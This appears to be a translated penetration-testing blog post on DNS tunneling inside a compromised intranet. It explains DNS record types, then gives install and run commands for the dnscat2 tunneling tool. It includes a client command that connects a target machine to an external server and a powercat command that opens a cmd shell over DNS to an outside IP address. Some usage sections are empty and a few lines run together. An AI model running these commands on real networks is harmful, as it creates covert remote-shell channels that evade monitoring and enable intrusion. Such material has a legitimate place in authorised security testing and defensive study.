Scenario: After entering the intranet, a lot of agents, penetration, and tunneling tools are needed. There are many varieties and complete types, and there is no end to learning. I will summarize and record, and the follow-up will continue to update the summary.
1. DNS tunnel
DNS (Domain Name System, Domain Name System), a distributed database on the World Wide Web as a mapping between domain names and IP addresses, enables users to access the Internet more conveniently without having to remember the IP numbers that can be directly read by machines. Through the domain name, the process of finally obtaining the IP address corresponding to the domain name is called domain name resolution (or host name resolution). Under the Windows platform, use the command line tool and enter nslookup. The returned result includes the IP address (A record) and alias (CNAME record) corresponding to the domain name. In addition to the above methods, you can also query the DNS information of the domain name through some DNS query sites such as foreign and domestic.
A address This record lists the IP address of a specific host name. This is an important record of name resolution.
CNAME Standard Name This record specifies the alias of the standard host name.
MX mail exchanger This record lists the host responsible for receiving emails sent to the domain.
NS Name Server This record specifies the name server responsible for a given area.
1,dnscat2
The dnscat2 software is an end-to-end transmission tool using the DNS protocol. It supports communication encryption, authentication, multiple sessions, similar to SSH tunnels, but the transmission of data is more concealed, and supports most popular DNS query types (TXT, MX, CNAME, A ,AAAA). The dnscat2 client is written in C language, and the server is written in ruby.
Server installation
$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ gem install bundler
$ bundle installLinux client installation
$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/client/
$ makewindows client installation
You need to compile by yourself (VS 2008) or download from release: https://downloads.skullsecurity.org/dnscat2/
-
How to use 1
Server running: ruby dnscat.rb
(Target machine) Client running: ./dnscat --dns server=103.vps.219,port=53
The connection is established and there is a session on the server
The ping command is executed successfully and the client responds
-
How to use 2 (direct connection)
Server:
Client:
-
How to use 3
Server: ruby./dnscat2.rb abc.com --secret=123456 --security=open --no-cache
Client:
Import-Module .\powercat.ps1
powercat -c 103.45.98.219 -p 53 -dns abc.com -e cmd
operation result:
Refer to the boss article:
https://mp.weixin.qq.com/s/KH-Y_8Df2COINksR6cbB2w
https://blog.csdn.net/localhost01/article/details/86591685
https://mp.weixin.qq.com/s/7kNISpuqFFVTbmal9z6AJA
https://mp.weixin.qq.com/s/vjmCX6JhdVeURCrhuMK4Aw
https://mp.weixin.qq.com/s/yccot8vJw9yNLOrwUshkLQ